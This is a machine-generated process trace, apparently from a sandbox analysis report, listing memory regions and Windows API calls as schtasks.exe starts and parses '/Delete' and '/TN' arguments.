filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2097
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2098
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 2099
start_va = 0x2c0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 2100
start_va = 0x2c0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 2101
start_va = 0x3c0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 2102
start_va = 0x50000
end_va = 0x78fff
monitored = 0
entry_point = 0x51010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2103
start_va = 0x80000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 2104
start_va = 0x3d0000
end_va = 0x557fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 2105
start_va = 0x50000
end_va = 0x78fff
monitored = 0
entry_point = 0x51010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2106
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2107
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2108
start_va = 0x560000
end_va = 0x6e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 2109
start_va = 0x6f0000
end_va = 0x1aeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 2110
start_va = 0x50000
end_va = 0x61fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\System32\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\schtasks.exe.mui")
Region:
id = 2125
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2126
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 2127
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2128
start_va = 0x1af0000
end_va = 0x1dbefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2148
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2149
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2150
start_va = 0x1f60000
end_va = 0x1fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 2151
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 2152
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2153
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2154
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2155
start_va = 0x1dc0000
end_va = 0x1e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001dc0000"
filename = ""
Region:
id = 2156
start_va = 0x1e80000
end_va = 0x1f5efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e80000"
filename = ""
Region:
id = 2157
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2158
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 2159
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2160
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 2161
start_va = 0x7fefb530000
end_va = 0x7fefb656fff
monitored = 0
entry_point = 0x7fefb5310ec
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 2162
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Thread:
id = 105
os_tid = 0xca4
[0379.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f7f0 | out: lpSystemTimeAsFileTime=0x24f7f0*(dwLowDateTime=0xfa7dae40, dwHighDateTime=0x1dab598))
[0379.915] GetCurrentProcessId () returned 0xce4
[0379.915] GetCurrentThreadId () returned 0xca4
[0379.915] GetTickCount () returned 0x1427313
[0379.915] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x24f7f8 | out: lpPerformanceCount=0x24f7f8*=2126061250440) returned 1
[0379.916] GetModuleHandleW (lpModuleName=0x0) returned 0xffa50000
[0379.916] __set_app_type (_Type=0x1)
[0379.916] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa7972c) returned 0x0
[0379.917] __wgetmainargs (in: _Argc=0xffa91240, _Argv=0xffa91250, _Env=0xffa91248, _DoWildCard=0, _StartInfo=0xffa9125c | out: _Argc=0xffa91240, _Argv=0xffa91250, _Env=0xffa91248) returned 0
[0379.918] _onexit (_Func=0xffa82ab0) returned 0xffa82ab0
[0379.918] _onexit (_Func=0xffa82ac4) returned 0xffa82ac4
[0379.919] _onexit (_Func=0xffa82afc) returned 0xffa82afc
[0379.919] _onexit (_Func=0xffa82b58) returned 0xffa82b58
[0379.919] _onexit (_Func=0xffa82b80) returned 0xffa82b80
[0379.920] _onexit (_Func=0xffa82ba8) returned 0xffa82ba8
[0379.920] _onexit (_Func=0xffa82bd0) returned 0xffa82bd0
[0379.920] _onexit (_Func=0xffa82bf8) returned 0xffa82bf8
[0379.921] _onexit (_Func=0xffa82c20) returned 0xffa82c20
[0379.921] _onexit (_Func=0xffa82c48) returned 0xffa82c48
[0379.921] _onexit (_Func=0xffa82c70) returned 0xffa82c70
[0379.922] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0379.922] WinSqmIsOptedIn () returned 0x0
[0379.923] GetProcessHeap () returned 0x80000
[0379.923] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9ba40
[0379.923] SetLastError (dwErrCode=0x0)
[0379.923] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0379.923] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0379.924] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0379.924] VerifyVersionInfoW (in: lpVersionInformation=0x24efb0, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24efb0) returned 1
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9ba60
[0379.924] lstrlenW (lpString="") returned 0
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x2) returned 0x9ba80
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x959f0
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9baa0
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95a20
[0379.924] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95a50
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95a80
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95ab0
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bac0
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95ae0
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95b10
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95b40
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95b70
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bae0
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95ba0
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95bd0
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c00
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c30
[0379.926] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0379.929] SetLastError (dwErrCode=0x0)
[0379.929] GetProcessHeap () returned 0x80000
[0379.929] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c60
[0379.929] GetProcessHeap () returned 0x80000
[0379.929] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c90
[0379.929] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95cc0
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95cf0
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95d20
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bb00
[0379.930] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x208) returned 0x9bca0
[0379.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9bca0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0379.931] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefc990000
[0379.933] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoSizeW") returned 0x7fefc9915fc
[0379.933] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0379.936] GetProcessHeap () returned 0x80000
[0379.936] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x74e) returned 0x9c270
[0379.936] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoW") returned 0x7fefc991614
[0379.936] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x9c270 | out: lpData=0x9c270) returned 1
[0379.937] GetProcAddress (hModule=0x7fefc990000, lpProcName="VerQueryValueW") returned 0x7fefc9915e0
[0379.937] VerQueryValueW (in: pBlock=0x9c270, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f098, puLen=0x24f100 | out: lplpBuffer=0x24f098*=0x9c60c, puLen=0x24f100) returned 1
[0379.941] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0379.941] _vsnwprintf (in: _Buffer=0x9bca0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f078 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0379.941] VerQueryValueW (in: pBlock=0x9c270, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f108, puLen=0x24f0f8 | out: lplpBuffer=0x24f108*=0x9c438, puLen=0x24f0f8) returned 1
[0379.941] lstrlenW (lpString="schtasks.exe") returned 12
[0379.941] lstrlenW (lpString="schtasks.exe") returned 12
[0379.941] lstrlenW (lpString=".EXE") returned 4
[0379.941] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0380.363] lstrlenW (lpString="schtasks.exe") returned 12
[0380.363] lstrlenW (lpString=".EXE") returned 4
[0380.363] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.364] lstrlenW (lpString="schtasks") returned 8
[0380.364] GetProcessHeap () returned 0x80000
[0380.364] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cb80
[0380.364] GetProcessHeap () returned 0x80000
[0380.364] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cbb0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cbe0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cc10
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bb20
[0380.365] _memicmp (_Buf1=0x9bb20, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa0) returned 0x9c0a0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cc40
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cc70
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cca0
[0380.366] GetProcessHeap () returned 0x80000
[0380.366] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bb40
[0380.366] _memicmp (_Buf1=0x9bb40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.366] GetProcessHeap () returned 0x80000
[0380.366] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x200) returned 0x9d350
[0380.366] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x9d350, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0380.367] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x30) returned 0x97c50
[0380.367] _vsnwprintf (in: _Buffer=0x9c0a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f078 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c270) returned 0x74e
[0380.368] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270 | out: hHeap=0x80000) returned 1
[0380.368] SetLastError (dwErrCode=0x0)
[0380.368] GetThreadLocale () returned 0x409
[0380.368] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="?") returned 1
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="create") returned 6
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="delete") returned 6
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="query") returned 5
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="change") returned 6
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="run") returned 3
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="end") returned 3
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="showsid") returned 7
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] SetLastError (dwErrCode=0x0)
[0380.370] SetLastError (dwErrCode=0x0)
[0380.370] lstrlenW (lpString="/Delete") returned 7
[0380.371] lstrlenW (lpString="-/") returned 2
[0380.371] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.371] lstrlenW (lpString="?") returned 1
[0380.371] lstrlenW (lpString="?") returned 1
[0380.371] GetProcessHeap () returned 0x80000
[0380.371] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9c150
[0380.371] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.371] GetProcessHeap () returned 0x80000
[0380.371] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa) returned 0x9c270
[0380.372] lstrlenW (lpString="Delete") returned 6
[0380.372] GetProcessHeap () returned 0x80000
[0380.372] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9c290
[0380.372] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.372] GetProcessHeap () returned 0x80000
[0380.372] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x14) returned 0x9c2b0
[0380.372] _vsnwprintf (in: _Buffer=0x9c270, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|?|") returned 3
[0380.372] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|Delete|") returned 8
[0380.372] lstrlenW (lpString="|?|") returned 3
[0380.372] lstrlenW (lpString="|Delete|") returned 8
[0380.372] SetLastError (dwErrCode=0x490)
[0380.372] lstrlenW (lpString="create") returned 6
[0380.372] lstrlenW (lpString="create") returned 6
[0380.372] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.373] GetProcessHeap () returned 0x80000
[0380.373] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.373] GetProcessHeap () returned 0x80000
[0380.373] RtlReAllocateHeap (Heap=0x80000, Flags=0xc, Ptr=0x9c270, Size=0x14) returned 0x9c2d0
[0380.373] lstrlenW (lpString="Delete") returned 6
[0380.373] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.373] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|create|") returned 8
[0380.373] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|Delete|") returned 8
[0380.373] lstrlenW (lpString="|create|") returned 8
[0380.373] lstrlenW (lpString="|Delete|") returned 8
[0380.373] StrStrIW (lpFirst="|create|", lpSrch="|Delete|") returned 0x0
[0380.374] SetLastError (dwErrCode=0x490)
[0380.374] lstrlenW (lpString="delete") returned 6
[0380.374] lstrlenW (lpString="delete") returned 6
[0380.374] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.374] lstrlenW (lpString="Delete") returned 6
[0380.374] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.374] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|delete|") returned 8
[0380.374] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|Delete|") returned 8
[0380.374] lstrlenW (lpString="|delete|") returned 8
[0380.374] lstrlenW (lpString="|Delete|") returned 8
[0380.374] StrStrIW (lpFirst="|delete|", lpSrch="|Delete|") returned="|delete|"
[0380.374] SetLastError (dwErrCode=0x0)
[0380.374] SetLastError (dwErrCode=0x0)
[0380.374] SetLastError (dwErrCode=0x0)
[0380.375] lstrlenW (lpString="/TN") returned 3
[0380.375] lstrlenW (lpString="-/") returned 2
[0380.375] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.375] lstrlenW (lpString="?") returned 1
[0380.375] lstrlenW (lpString="?") returned 1
[0380.375] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.375] lstrlenW (lpString="TN") returned 2
[0380.375] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.375] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|?|") returned 3
[0380.375] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.375] lstrlenW (lpString="|?|") returned 3
[0380.375] lstrlenW (lpString="|TN|") returned 4
[0380.375] SetLastError (dwErrCode=0x490)
[0380.375] lstrlenW (lpString="create") returned 6
[0380.376] lstrlenW (lpString="create") returned 6
[0380.376] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.376] lstrlenW (lpString="TN") returned 2
[0380.376] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.376] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|create|") returned 8
[0380.376] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.376] lstrlenW (lpString="|create|") returned 8
[0380.376] lstrlenW (lpString="|TN|") returned 4
[0380.376] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0380.376] SetLastError (dwErrCode=0x490)
[0380.376] lstrlenW (lpString="delete") returned 6
[0380.376] lstrlenW (lpString="delete") returned 6
[0380.376] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.377] lstrlenW (lpString="TN") returned 2
[0380.377] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.377] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|delete|") returned 8
[0380.377] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.377] lstrlenW (lpString="|delete|") returned 8
[0380.377] lstrlenW (lpString="|TN|") returned 4
[0380.377] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0380.377] SetLastError (dwErrCode=0x490)
[0380.377] lstrlenW (lpString="query") returned 5
[0380.377] lstrlenW (lpString="query") returned 5
[0380.377] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.377] lstrlenW (lpString="TN") returned 2
[0380.378] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.378] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|query|") returned 7
[0380.378] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.378] lstrlenW (lpString="|query|") returned 7
[0380.378] lstrlenW (lpString="|TN|") returned 4
[0380.378] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0380.378] SetLastError (dwErrCode=0x490)
[0380.378] lstrlenW (lpString="change") returned 6
[0380.378] lstrlenW (lpString="change") returned 6
[0380.378] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.378] lstrlenW (lpString="TN") returned 2
